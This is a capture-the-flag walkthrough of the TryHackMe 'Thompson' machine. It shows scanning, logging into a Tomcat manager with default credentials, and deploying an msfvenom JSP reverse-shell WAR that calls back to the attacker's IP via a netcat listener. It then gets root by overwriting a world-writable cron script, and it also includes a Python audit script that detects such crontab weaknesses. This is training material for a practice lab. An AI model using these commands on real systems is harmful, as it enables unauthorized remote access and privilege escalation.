TryHackMe Thompson

Hello Everyone! Today we are going to solve the TryHackMe machine Thompson.

First, connect to the THM network over the VPN and start the machine.

Start with an Nmap scan to find the open ports and the services running on the machine.

Note: If you are running as root, you don't need to prefix the commands with sudo.

nmap -Pn 10.10.195.168

Perform a more detailed scan to find the versions of the services running on the system.

nmap -sC -sV -A 10.10.195.168

Let's open the IP address in the browser to see what the web page reveals.

Check all the pages for any useful information. If we open the manager app, we can see it is asking for a password.

Once we click Cancel, the page that comes back gives us the username "tomcat" and the password "s3cret".

Now, try to log in with those credentials.

We successfully logged into the manager app. We can see a lot of directories and information inside, and we can see that it lets us upload a WAR file.

Now we can upload a payload and get a reverse shell; the upload only accepts the WAR file format. Try googling for the payload and see what we can find.

We found a command to generate a payload that gives us a reverse shell.

ifconfig tun0

The LHOST is our tun0 IP, and LPORT can be any unused port of our choice.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.93 LPORT=1234 -f war > shell.war

Now upload the shell.war file through the website. Before clicking Deploy, note where it is going to be uploaded, and afterwards confirm that it has uploaded successfully.

We can see that it has been uploaded under /manager and that our shell has deployed successfully. Now, start a netcat listener on the given port and click on the shell file in the browser; we successfully get our connection.

nc -nlvp 1234

Check which user we are and the current working directory.

In the /home/jack folder we find our user flag. To escalate privileges and get a root shell, we need to find a way in.

cat user.txt

Get an interactive shell using Python so that we can see everything properly.

python -c 'import pty; pty.spawn("/bin/bash")'

Now, we have also seen another file, id.sh, which has full permissions for everyone. Check whether it is run all the time with root privileges or not by looking at /etc/crontab.

cat /etc/crontab

We can see that it runs all the time with root privileges, and only from the /home/jack directory. Using that, we can copy the root flag from /root/root.txt into a new file, finalflag.txt.
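The weakness here is a root cron job running a script that a non-root user can edit. As an added example (not part of the original write-up), the following audit script parses a system crontab in /etc/crontab format, resolves the files each root job executes (honouring a leading cd), and flags any that is owned by an untrusted uid or writable by group or others; the crontab text and the /home/jack tree it builds under a temp directory are constructed for illustration.

```python
"""Audit /etc/crontab for root jobs that run a script a non-root user can
modify, the flaw behind the id.sh escalation on Thompson. Added example, not
from the original write-up; the crontab and /home/jack tree are constructed."""
import os, shlex, stat, tempfile

def parse_system_crontab(text):
    """Yield (user, command) per job line of the system crontab format:
    minute hour day month weekday user command (SHELL=/PATH= lines skipped)."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) == 7 and not fields[0].startswith("#"):
            yield fields[5], fields[6]

def scripts_in_command(command, home):
    """Resolve files the command names. cron starts in the job user's home and
    'cd DIR' moves where relative names resolve; os.path.join keeps absolute ones."""
    cwd, tokens = home, shlex.split(command)
    for i, tok in enumerate(tokens):
        if tok == "cd" and i + 1 < len(tokens):
            cwd = os.path.join(cwd, tokens[i + 1])
        elif os.path.isfile(os.path.join(cwd, tok)):
            yield os.path.join(cwd, tok)

def weakly_protected(path, trusted_uids):
    """True if owned by an untrusted uid or writable by group or others."""
    st = os.stat(path)
    return st.st_uid not in trusted_uids or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_risky_root_jobs(crontab_text, root_home="/root", trusted_uids=(0,)):
    """Return [(script, command)] for root jobs whose script is weakly protected."""
    return [(path, cmd)
            for user, cmd in parse_system_crontab(crontab_text) if user == "root"
            for path in scripts_in_command(cmd, root_home)
            if weakly_protected(path, trusted_uids)]

def demo():
    """Constructed layout: id.sh is world-writable (as on Thompson), backup.sh is
    0755. The current uid is trusted so this also runs unprivileged."""
    jack = os.path.join(tempfile.mkdtemp(), "home", "jack")
    os.makedirs(jack)
    for name, mode in (("id.sh", 0o777), ("backup.sh", 0o755)):
        with open(os.path.join(jack, name), "w") as f:
            f.write("#!/bin/bash\nid > test.txt\n")
        os.chmod(os.path.join(jack, name), mode)
    crontab = ("# m h dom mon dow user command\n"
               f"*/5 * * * * root bash {jack}/backup.sh\n"
               f"* * * * * root cd {jack} && bash id.sh\n")
    return find_risky_root_jobs(crontab, trusted_uids={0, os.getuid()})

if __name__ == "__main__":
    for script, cmd in demo():
        print(f"RISK: {script} is modifiable by non-root and run as root via: {cmd}")
```

On a real host, feed it the contents of /etc/crontab with the default trusted_uids=(0,); only the id.sh job is reported in the constructed case, because backup.sh is not group- or world-writable.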

echo "cat /root/root.txt > finalflag.txt" > id.sh

Wait a minute for the cron job to run, and we can see our finalflag.txt file.

ls

We finally got our root flag. There are other methods to get the flag as well, but I just copied it directly from the /root directory.

cat finalflag.txt

Finally, we have successfully completed the machine.

This concludes the room and both flags have been captured!

Penetration Tester| WAPT | Bug Bounty Hunter

Pavan Msvs